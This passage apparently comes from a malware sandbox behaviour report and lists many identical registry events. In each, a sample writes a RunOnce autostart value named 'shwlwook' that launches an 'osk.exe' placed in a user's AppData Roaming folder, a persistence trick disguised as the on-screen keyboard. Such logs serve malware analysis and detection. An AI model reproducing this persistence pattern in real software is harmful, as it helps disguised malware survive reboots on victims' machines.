| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
